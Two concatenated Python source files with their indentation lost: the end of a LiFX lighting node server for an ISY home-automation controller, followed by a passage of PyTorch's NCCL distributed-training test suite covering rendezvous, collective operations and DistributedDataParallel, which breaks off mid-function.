LOGGER.info('Received SetOff command for group {} from ISY. Setting all {} members to OFF.'.format(self.label, self.numMembers))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxGroup.set_color(COLORS[_color][1], 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolor error caught %s', str(ex))
else:
LOGGER.info('Received SetColor command for group {} from ISY. Changing color to: {} for all {} members.'.format(self.name, COLORS[_color][0], self.numMembers))
self._power_on_change()
def setHue(self, command):
_hue = int(command.get('value'))
try:
self.lifxGroup.set_hue(_hue, 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethue error caught %s', str(ex))
else:
LOGGER.info('Received SetHue command for group {} from ISY. Changing hue to: {} for all {} members.'.format(self.name, _hue, self.numMembers))
self._power_on_change()
def setSat(self, command):
_sat = int(command.get('value'))
try:
self.lifxGroup.set_saturation(_sat, 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setsaturation error caught %s', str(ex))
else:
LOGGER.info('Received SetSat command for group {} from ISY. Changing saturation to: {} for all {} members.'.format(self.name, _sat, self.numMembers))
self._power_on_change()
def setBri(self, command):
_bri = int(command.get('value'))
try:
self.lifxGroup.set_brightness(_bri, 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setbrightness error caught %s', str(ex))
else:
LOGGER.info('Received SetBri command for group {} from ISY. Changing brightness to: {} for all {} members.'.format(self.name, _bri, self.numMembers))
self._power_on_change()
def setCTemp(self, command):
_ctemp = int(command.get('value'))
try:
self.lifxGroup.set_colortemp(_ctemp, 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolortemp error caught %s', str(ex))
else:
LOGGER.info('Received SetCTemp command for group {} from ISY. Changing color temperature to: {} for all {} members.'.format(self.name, _ctemp, self.numMembers))
self._power_on_change()
def set_ir_brightness(self, command):
_val = int(command.get('value'))
try:
self.lifxGroup.set_infrared(_val)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group set_infrared_brightness error caught %s', str(ex))
else:
LOGGER.info('Received SetIR command for group {} from ISY. Changing infrared brightness to: {} for all {} members.'.format(self.name, _val, self.numMembers))
self._power_on_change()
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
except TypeError:
duration = 0
try:
self.lifxGroup.set_color(color, duration = duration, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethsbkd error caught {}'.format(str(ex)))
else:
            LOGGER.info('Received SetHSBKD command for group {} from ISY. Setting all members to Color {}, duration {}'.format(self.label, color, duration))
self._power_on_change()
drivers = [{'driver': 'ST', 'value': 0, 'uom': 56}]
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD,
'SETH': setHue, 'SETS': setSat, 'SETB': setBri,
'CLITEMP': setCTemp, 'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness
}
id = 'lifxgroup'
if __name__ == "__main__":
try:
polyglot = polyinterface.Interface('LiFX')
polyglot.start()
control = Controller(polyglot)
control.runForever()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
|
test_c10d_nccl.py
|
import copy
import math
import os
import random
import signal
import sys
import tempfile
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import product
from unittest import mock
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import test_c10d_common
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from test_c10d_common import gpus_for_rank, DoubleGpuNet, ConvNet, ModuleForDdpCommHook
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
IS_WINDOWS,
TestCase,
run_tests,
retry_on_connect_failures,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_TSAN,
sandcastle_skip,
sandcastle_skip_if,
)
from torch.utils.checkpoint import checkpoint
from torch.distributed.optim import functional_optim_map
if not IS_WINDOWS:
from torch.distributed.optim.functional_sgd import _FunctionalSGD
from torch.distributed.optim.functional_adam import _FunctionalAdam
from torch.distributed.optim.functional_adamw import _FunctionalAdamW
if TEST_WITH_TSAN:
print(
"Skip as TSAN is not fork-safe since we're forking in a multi-threaded environment",
file=sys.stderr,
)
sys.exit(0)
if TEST_WITH_DEV_DBG_ASAN:
print(
"Skip ASAN as torch + multiprocessing spawn have known issues", file=sys.stderr
)
sys.exit(0)
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_common_errors(self):
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
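# --- Illustrative sketch (not part of the original test suite) ---
# The assertions above exercise the env:// rendezvous handler both through the
# MASTER_ADDR/MASTER_PORT/RANK/WORLD_SIZE environment variables and through
# rank/world_size passed as URL query parameters. This hypothetical helper just
# restates how such a URL is assembled for the query-parameter cases.
def _env_rendezvous_url(rank=None, world_size=None):
    params = []
    if rank is not None:
        params.append("rank={}".format(rank))
    if world_size is not None:
        params.append("world_size={}".format(world_size))
    return "env://" + ("?" + "&".join(params) if params else "")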
class TimeoutTest(test_c10d_common.AbstractTimeoutTest, TestCase):
@requires_nccl()
@retry_on_connect_failures
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_default_store_timeout_nccl(self):
self._test_default_store_timeout("nccl")
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() > 0, "GPUs are available, skipping test"
)
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self.num_gpus = torch.cuda.device_count()
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
        # allgather_base is GPU-count agnostic.
        # Each rank contributes one tensor regardless of the number of GPUs
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size), dtype=tensor.dtype).cuda(device_id)
allgather_base(output_t, tensor)
# Verification
self.assertEqual(torch.arange(self.world_size), output_t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticipate an error
with self.assertRaisesRegex(
RuntimeError,
"output tensor size must be equal to world_size times input tensor size",
):
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=tensor.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
allgather_base(output_t, tensor)
# anticipate an error
with self.assertRaisesRegex(
RuntimeError, "output tensor must have the same type as input tensor"
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
allgather_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticipate an error
with self.assertRaisesRegex(
RuntimeError,
"input tensor must be the same size as output size times world size",
):
input_t = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=input_t.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
reduce_scatter_base(output_t, input_t)
# anticipate an error
with self.assertRaisesRegex(
RuntimeError, "input tensor must be the same type as the outut tensor."
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
reduce_scatter_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
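# In reduce_scatter, each participant's output tensor is the elementwise
# reduction of the corresponding slot across every participant's input list.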
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# Each local GPU i contributes a list of virtual_world_size consecutive
# values starting at rank * num_gpus + i (see tensor_lists below).
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# reduce_scatter_base is agnostic to the number of GPUs:
# each rank contributes exactly one tensor, regardless of its GPU count.
output_t = torch.empty([1]).cuda(device_id)
tensor = torch.arange(self.world_size, dtype=output_t.dtype).cuda(device_id)
reduce_scatter_base(output_t, tensor)
# Verification
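# Every rank contributes torch.arange(world_size); the elementwise sum is
# [0, world_size, 2 * world_size, ...], and rank r is scattered element r,
# i.e. r * world_size.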
self.assertEqual(output_t[0], self.rank * self.world_size)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
# Launch one allreduce per GPU count k = 2, 3, ..., self.num_gpus;
# tensors_list[k - 2] holds the tensors [1..k] placed on the first k GPUs.
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
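# After the barrier, every outstanding allreduce must have finished, so each
# tensor in the i-GPU group equals 1 + 2 + ... + i = i * (i + 1) / 2.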
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class DistributedDataParallelTest(
test_c10d_common.AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
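# Since DDP normalizes the gradients by world_size before the reduction,
# none of the fp16 gradients should overflow to inf.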
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
